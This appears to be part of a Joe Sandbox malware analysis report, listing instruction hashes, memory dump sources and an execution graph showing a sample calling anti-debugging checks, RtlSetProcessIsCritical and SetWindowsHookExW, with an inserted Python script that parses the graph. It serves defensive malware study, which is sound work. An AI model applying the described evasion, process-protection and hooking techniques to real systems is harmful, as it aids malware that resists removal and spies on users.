                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d9b17eb81aedd4c734d2109ff276dd8eef3edefe248cf40c794e25ae0a49b158
                                                                                          • Instruction ID: f4b19aee3e22d1626c3f233fa9a12bfaee50d37cf6c6b82a5718111ceb21f482
                                                                                          • Opcode Fuzzy Hash: d9b17eb81aedd4c734d2109ff276dd8eef3edefe248cf40c794e25ae0a49b158
                                                                                          • Instruction Fuzzy Hash: 85C00274A153148FDB645BB8A41C29D7AA1AB48351F000466A84BC2389DB344B41CF65
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d18ff176298a6d83f21a2f7405cd0359e713d5176f149eef2d391b6c25f015d4
                                                                                          • Instruction ID: 3ee4057982a47a9b570c15c1ccdf1d6b0044bbda0afb7c271747173698ed06a4
                                                                                          • Opcode Fuzzy Hash: d18ff176298a6d83f21a2f7405cd0359e713d5176f149eef2d391b6c25f015d4
                                                                                          • Instruction Fuzzy Hash: 1EA02230002B0CC3820032B02000220B38C8888008B8000BC820C0CA220A33E8A08088
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3bc8813938afab0357cd231dd6f0553c14ce4019903e70bb194045ee5f146e00
                                                                                          • Instruction ID: 9be930d0c7c9ad83452cffbebf84acd904011780677aa4eb6b85cd7c80210bb1
                                                                                          • Opcode Fuzzy Hash: 3bc8813938afab0357cd231dd6f0553c14ce4019903e70bb194045ee5f146e00
                                                                                          • Instruction Fuzzy Hash: 45A0243003170CC7C30017F0700D4107F5CD5001153400074F50C00511DF33F010CD50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87b399f941d336cfe109e07279212884c1145cc0ae64010404687f6c60834537
                                                                                          • Instruction ID: c2fdd32b0b43417e5aeae61567562f686c67fd742ec6a9e725da83ca8e5fce18
                                                                                          • Opcode Fuzzy Hash: 87b399f941d336cfe109e07279212884c1145cc0ae64010404687f6c60834537
                                                                                          • Instruction Fuzzy Hash: F990023108460C8B4650279D740969E775CA54555D7940051E50D515095B5965114AA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d1ccbc1ee502bba06986e5b80ba131b7e79c04e1c778a4c396d3452fd07d9047
                                                                                          • Instruction ID: a65ddc26423e1356141464e7b7766e0c894074d5d06de67e06c0bac62bf9bd83
                                                                                          • Opcode Fuzzy Hash: d1ccbc1ee502bba06986e5b80ba131b7e79c04e1c778a4c396d3452fd07d9047
                                                                                          • Instruction Fuzzy Hash: 26B01230110214CFD7505A04CD082993221A740301F0001506402911848B700D44CF10
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq
                                                                                          • API String ID: 0-751858264
                                                                                          • Opcode ID: adadab181387a2ffdfbe06e28c13ec45130bc0a45250d5e315ba7b6bc14c6cd1
                                                                                          • Instruction ID: 258bdfcfaadd4bfc40d78ea81b3e3529c85d409d164952c27cf50963d3bef147
                                                                                          • Opcode Fuzzy Hash: adadab181387a2ffdfbe06e28c13ec45130bc0a45250d5e315ba7b6bc14c6cd1
                                                                                          • Instruction Fuzzy Hash: EF7106B5B002458FD748DF6EE88869EBBB2FFC8300B14C569D404AB268EF345A05DF52
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq
                                                                                          • API String ID: 0-751858264
                                                                                          • Opcode ID: 23bb92adc7fd30d7e5aa2ba10e8ce36aa4fb8c141b007f7428b00b5d64f8153d
                                                                                          • Instruction ID: 68294e5933e60caf5d5b4ade9c9a1ef2fc886dcd3736ed58c3bb41d5c27622fb
                                                                                          • Opcode Fuzzy Hash: 23bb92adc7fd30d7e5aa2ba10e8ce36aa4fb8c141b007f7428b00b5d64f8153d
                                                                                          • Instruction Fuzzy Hash: 307128B4A006058BD718EF7EE88469EBBF3FFC9300B10D569D404AB268DF745906DB52
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq
                                                                                          • API String ID: 0-751858264
                                                                                          • Opcode ID: 448b623d2a7600d171428412be08c1b7a1caee3bc759054b924d4152dba6571a
                                                                                          • Instruction ID: 7f7cc98729741e5b184a7e21f93cb049b3b68793292b919c70709cfcd9bacf68
                                                                                          • Opcode Fuzzy Hash: 448b623d2a7600d171428412be08c1b7a1caee3bc759054b924d4152dba6571a
                                                                                          • Instruction Fuzzy Hash: 4271F5B5B006458FD748DF6EE88869EBBB2FFC8300B14D529D404AB268EF345A05DF52
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: \VVm
                                                                                          • API String ID: 0-390912563
                                                                                          • Opcode ID: b1ed8644e2cde71751569c7b4a70d941a84ed23ebbbc6ebf6a4215374db13682
                                                                                          • Instruction ID: d3993c0a6dba152d98050d2d5810bc2c34865a1ed914150487faf9fc7c949ee8
                                                                                          • Opcode Fuzzy Hash: b1ed8644e2cde71751569c7b4a70d941a84ed23ebbbc6ebf6a4215374db13682
                                                                                          • Instruction Fuzzy Hash: 43917C70E00249AFDF54CFA8C9927EEBBF2AF98324F14852DE405A7255EB749845CF81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4f4f057cceb04b3f05871c7d67b5fd0e34fc1771114456471ec77e9f851a041e
                                                                                          • Instruction ID: 3a316ae38f22fab831b30a90375f618719d5dc6570ea19f32fb117322662ab1f
                                                                                          • Opcode Fuzzy Hash: 4f4f057cceb04b3f05871c7d67b5fd0e34fc1771114456471ec77e9f851a041e
                                                                                          • Instruction Fuzzy Hash: F3D1AF71E111698FCB41DFA8C9805ADFBF1FF48340F148669D865FB24AD734A946CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 443f5f6fe3b5caeaa93f4919617908d67b97eb73a3b56f4a9c30ae5217b45bd1
                                                                                          • Instruction ID: f3df142592ed5d916d88683831954fdc39fb37cb59c2c19ae97d414aec7dd4cf
                                                                                          • Opcode Fuzzy Hash: 443f5f6fe3b5caeaa93f4919617908d67b97eb73a3b56f4a9c30ae5217b45bd1
                                                                                          • Instruction Fuzzy Hash: D6C189B1E102698BCB11CF98D8806EDFBF1FF48304F298669D454BB20AD734A946CF90

                                                                                          Execution Graph

                                                                                          Execution Coverage:16.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:34
                                                                                          Total number of Limit Nodes:3
                                                                                          execution_graph (one line per caller: node id, address and, where the node calls out of the sample, the API name; callees after the arrow):
                                                                                          13099 11c1978 -> 13100 11c20bf, 13101 11c19a1
                                                                                          13101 11c19a1 -> 13105 11c25e8, 13111 11c2598
                                                                                          13105 11c25e8 -> 13106 11c25a6, 13107 11c25f6
                                                                                          13106 11c25a6 -> 13108 11c25bb, 13116 11cb3c8, 13121 11cb5d0
                                                                                          13108 11c25bb -> 13102 11c1b17
                                                                                          13111 11c2598 -> 13113 11c25a6
                                                                                          13113 11c25a6 -> 13112 11c25bb, 13114 11cb3c8 CheckRemoteDebuggerPresent, 13115 11cb5d0 CheckRemoteDebuggerPresent
                                                                                          13112 11c25bb -> 13102 11c1b17
                                                                                          13114 11cb3c8 CheckRemoteDebuggerPresent -> 13112 11c25bb
                                                                                          13115 11cb5d0 CheckRemoteDebuggerPresent -> 13112 11c25bb
                                                                                          13116 11cb3c8 -> 13117 11cb3d7
                                                                                          13117 11cb3d7 -> 13108 11c25bb, 13118 11cb3f8, 13125 11c69dc
                                                                                          13118 11cb3f8 -> 13108 11c25bb
                                                                                          13121 11cb5d0 -> 13122 11cb5ee
                                                                                          13122 11cb5ee -> 13123 11c69dc CheckRemoteDebuggerPresent
                                                                                          13123 11c69dc CheckRemoteDebuggerPresent -> 13124 11cb601
                                                                                          13124 11cb601 -> 13108 11c25bb
                                                                                          13125 11c69dc -> 13126 11cb638 CheckRemoteDebuggerPresent
                                                                                          13126 11cb638 CheckRemoteDebuggerPresent -> 13128 11cb601
                                                                                          13128 11cb601 -> 13108 11c25bb
                                                                                          13136 11c1ae6 -> 13137 11c1aee
                                                                                          13137 11c1aee -> 13139 11c2598 CheckRemoteDebuggerPresent, 13140 11c25e8 CheckRemoteDebuggerPresent
                                                                                          13139 11c2598 CheckRemoteDebuggerPresent -> 13138 11c1b17
                                                                                          13140 11c25e8 CheckRemoteDebuggerPresent -> 13138 11c1b17
                                                                                          13129 11cfc50 -> 13130 11cfc94 RtlSetProcessIsCritical
                                                                                          13130 11cfc94 RtlSetProcessIsCritical -> 13131 11cfcf1
                                                                                          13132 11cfdf0 -> 13133 11cfe34 SetWindowsHookExW
                                                                                          13133 11cfe34 SetWindowsHookExW -> 13135 11cfe7a
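The execution graph above is exported by the sandbox as a flat token stream: a node is "id address" optionally followed by the name of the Win32 API that node calls, and an edge is "caller->callee". The parser below is an added example, not code from the Joe Sandbox report or its IDA plugin. It embeds the token stream copied from this section, rebuilds nodes and edges, treats nodes that nothing calls as the traced entry points, and reports which APIs each entry point can reach. On this sample that separates the anti-debugging path (CheckRemoteDebuggerPresent, reached from two entry points through several intermediate functions) from the process-protection path (RtlSetProcessIsCritical, which makes the process critical so that terminating it crashes the system) and the hook installation (SetWindowsHookExW). The token layout assumptions are the ones visible on the page: node ids are decimal, an API name starts with a letter, and edges contain "->".

```python
"""Parse a Joe Sandbox execution_graph token stream and map each entry point
to the Win32 APIs it can reach (added example, not part of the report)."""
import re
from collections import defaultdict

# Token stream copied from the Execution Graph section of this report.
# Node entries are "<id> <address> [<api>]"; edges are "<caller>-><callee>".
EXECUTION_GRAPH = """
execution_graph 13099 11c1978 13100 11c20bf 13099->13100 13101 11c19a1 13099->13101
13105 11c25e8 13101->13105 13111 11c2598 13101->13111 13102 11c1b17 13106 11c25a6
13105->13106 13107 11c25f6 13105->13107 13108 11c25bb 13106->13108 13116 11cb3c8
13106->13116 13121 11cb5d0 13106->13121 13108->13102 13113 11c25a6 13111->13113
13112 11c25bb 13112->13102 13113->13112 13114 11cb3c8 CheckRemoteDebuggerPresent
13113->13114 13115 11cb5d0 CheckRemoteDebuggerPresent 13113->13115 13114->13112
13115->13112 13117 11cb3d7 13116->13117 13117->13108 13118 11cb3f8 13117->13118
13125 11c69dc 13117->13125 13118->13108 13122 11cb5ee 13121->13122
13123 11c69dc CheckRemoteDebuggerPresent 13122->13123 13124 11cb601 13123->13124
13124->13108 13126 11cb638 CheckRemoteDebuggerPresent 13125->13126 13128 11cb601
13126->13128 13128->13108 13136 11c1ae6 13137 11c1aee 13136->13137
13139 11c2598 CheckRemoteDebuggerPresent 13137->13139
13140 11c25e8 CheckRemoteDebuggerPresent 13137->13140 13138 11c1b17 13139->13138
13140->13138 13129 11cfc50 13130 11cfc94 RtlSetProcessIsCritical 13129->13130
13131 11cfcf1 13130->13131 13132 11cfdf0 13133 11cfe34 SetWindowsHookExW
13132->13133 13135 11cfe7a 13133->13135
"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")   # caller->callee
ID_RE = re.compile(r"^\d+$")              # decimal node id
API_RE = re.compile(r"^[A-Za-z_]\w*$")    # API name (assumed: starts with a letter)


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, api_or_None),
    edges is a list of (caller_id, callee_id) in listing order."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges = {}, []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            i += 1
            continue
        if not ID_RE.match(tok) or i + 1 >= len(tokens):
            raise ValueError(f"unexpected token {tok!r} at position {i}")
        node_id, address = tok, tokens[i + 1]   # address always follows the id
        i += 2
        api = None
        # Only nodes that call out of the sample carry an API name after the address.
        if i < len(tokens) and API_RE.match(tokens[i]):
            api = tokens[i]
            i += 1
        nodes[node_id] = (address, api)
    return nodes, edges


def entry_points(nodes, edges):
    """Nodes with no caller: the roots the sandbox traced execution from."""
    called = {callee for _, callee in edges}
    return [n for n in nodes if n not in called]


def reachable_apis(nodes, edges, root):
    """Depth-first walk from root collecting every API name on a reachable node."""
    succ = defaultdict(list)
    for caller, callee in edges:
        succ[caller].append(callee)
    seen, stack, apis = set(), [root], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        _, api = nodes.get(n, (None, None))
        if api:
            apis.add(api)
        stack.extend(succ[n])
    return apis


def summarize(text=EXECUTION_GRAPH):
    """Map each entry point's address to the sorted APIs reachable from it."""
    nodes, edges = parse_execution_graph(text)
    return {nodes[r][0]: sorted(reachable_apis(nodes, edges, r))
            for r in entry_points(nodes, edges)}


if __name__ == "__main__":
    for address, apis in summarize().items():
        print(f"{address}: {', '.join(apis) or '(no API reached)'}")
```

Running it prints one line per entry point; the two roots at 11c1978 and 11c1ae6 both end in CheckRemoteDebuggerPresent, while 11cfc50 reaches RtlSetProcessIsCritical and 11cfdf0 reaches SetWindowsHookExW. The node and edge counts recovered by the parser (34 nodes) can be checked against the "Total number of Nodes" figure the report states.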
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 011CB6AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: e1f51cc3fbf8a8f4bda6d578e16191b44018a2ff1b19c88af3bd150e98d1c9f5
                                                                                          • Instruction ID: e3510c1a89137ac21d9ffd69d33c0ce89a9254cf2a8af1c0bab09b78a7c76470
                                                                                          • Opcode Fuzzy Hash: e1f51cc3fbf8a8f4bda6d578e16191b44018a2ff1b19c88af3bd150e98d1c9f5
                                                                                          • Instruction Fuzzy Hash: 262166B1C002598FDB10CFAAC585BEEBBF5AF58310F28845AE859A3350D3789944CF60
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 011CB6AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 9f684fd613b3af0438223414190fec22959f571cf0e3dc9645c8b40dda06f923
                                                                                          • Instruction ID: f5516e95f949d3c69ff40b2ea4d4ca567e665b2c3cf5120156ea3f9f30eccc46
                                                                                          • Opcode Fuzzy Hash: 9f684fd613b3af0438223414190fec22959f571cf0e3dc9645c8b40dda06f923
                                                                                          • Instruction Fuzzy Hash: C72166B1805219CFDB14CF9AC885BEEBBF4EF58320F14845AE459A7340D778A944CFA5
                                                                                          APIs
                                                                                          • RtlSetProcessIsCritical.NTDLL(?,?), ref: 011CFCE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: 3a31e549cc0a13d0932def565c2fea4372f2fc7e0df495d7a23c413da894a46e
                                                                                          • Instruction ID: 7027075027296f7a5683dfa0931e088c8e1075eeec4078c581adf2a0c5518f84
                                                                                          • Opcode Fuzzy Hash: 3a31e549cc0a13d0932def565c2fea4372f2fc7e0df495d7a23c413da894a46e
                                                                                          • Instruction Fuzzy Hash: FB214AB6901259CFDB14CF9AD480BEEBFF4AF58311F14805AE955A3640C3789944DF61
                                                                                          APIs
                                                                                          • RtlSetProcessIsCritical.NTDLL(?,?), ref: 011CFCE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: 46ae3e65ba9827cb662bb58185c781941b21bab7eac014dabb125ca227a22ae5
                                                                                          • Instruction ID: 5dea6e2660555c18f1495dd7c668ad2e70fd99981755cd2054797568eb1d1e3f
                                                                                          • Opcode Fuzzy Hash: 46ae3e65ba9827cb662bb58185c781941b21bab7eac014dabb125ca227a22ae5
                                                                                          • Instruction Fuzzy Hash: 8E215CB1901259CFDB14CF9AD480BEEFBF4AF58310F14805AE555A3240C378A944DF61
                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 011CFE6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 5fe6bcb6ed0a7e60deefc487bbb80d9a4cf55c728f6a13aa42d8e4162516a2af
                                                                                          • Instruction ID: 4ee9b148c0a25da3a851a0a358195824b1d5398b1c472da5de3995d6eb9add15
                                                                                          • Opcode Fuzzy Hash: 5fe6bcb6ed0a7e60deefc487bbb80d9a4cf55c728f6a13aa42d8e4162516a2af
                                                                                          • Instruction Fuzzy Hash: 582134B1D0021A8FDB14CFAAC944BDEBBF5AB88310F14841AE419A7250C774A941CFA1
                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 011CFE6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 8483c28fef3d424c2852340709633fb4376507966d0df35085a3d6038f2c74a8
                                                                                          • Instruction ID: 576d12a76ac0d34c726ff321f187cece969248571f7c1fea8fca7c130d4b02dd
                                                                                          • Opcode Fuzzy Hash: 8483c28fef3d424c2852340709633fb4376507966d0df35085a3d6038f2c74a8
                                                                                          • Instruction Fuzzy Hash: 4F2127B1D002198FDB14DFAAC944BDEFBF5EF88720F10841AD519A7250C775A941CFA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac9d9167fcdcfb35262320f60a594f26f81cbea284218acbf444a520c0e2e723
                                                                                          • Instruction ID: 714ab3f0e5583fe96b9ab73785cb890ca81d4626be61d5321d8bf47bd860c0e3
                                                                                          • Opcode Fuzzy Hash: ac9d9167fcdcfb35262320f60a594f26f81cbea284218acbf444a520c0e2e723
                                                                                          • Instruction Fuzzy Hash: A521F5B5508208AFDF09DF58E5C0B26BB75FF84314F24C56DE9494B352C736D446CA62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77a46c749672603d205242c868a5651e9a03b83210fb82c137a7277d14bbde90
                                                                                          • Instruction ID: 07442cba06c9c813a080b9eaba07059513aa29515062489377cfa84c579f6f94
                                                                                          • Opcode Fuzzy Hash: 77a46c749672603d205242c868a5651e9a03b83210fb82c137a7277d14bbde90
                                                                                          • Instruction Fuzzy Hash: 3F21D3B5604208AFDF09DF58F9C0B26BB75EF84314F24C56DD9094B356C736D446CAA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e8168a1207dbfb339674ce2b752bb0e59159f0d2c442253ad338c92921899836
                                                                                          • Instruction ID: e39942326b12e17c1dacd8f1547cbde35d340346831dabf58762631afe33ce26
                                                                                          • Opcode Fuzzy Hash: e8168a1207dbfb339674ce2b752bb0e59159f0d2c442253ad338c92921899836
                                                                                          • Instruction Fuzzy Hash: F921D3B15042049FDF19DF58E5C0B26BB75EF88324F20C56DE90A4B356C336D446C662
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction ID: 6611346cffe9fecde613343d94764281555dbd4eb5c53ee90840a3d2ba458832
                                                                                          • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction Fuzzy Hash: 6B11BB75504284DFDB06CF54E9C0B15BBB2FB84214F28C6AAD8094B756C33AD44ACBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction ID: 379d14004daabd7e5eb8765d21f37befb59d117751127c078b06da1f2c4ffc23
                                                                                          • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction Fuzzy Hash: 3C11BBB5508684CFDB06CF54E5C0B15BFB2FB84318F28C6AAD8494B752C33AD44ACBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7c133aacda7c84256749da232d71bf144b4f4d1159547abdddc2f0c5f0aaaa43
                                                                                          • Instruction ID: ba2b4aff31cad3f647a0cd3161142cc0e71f10265adb2476f8beb9014c6f5215
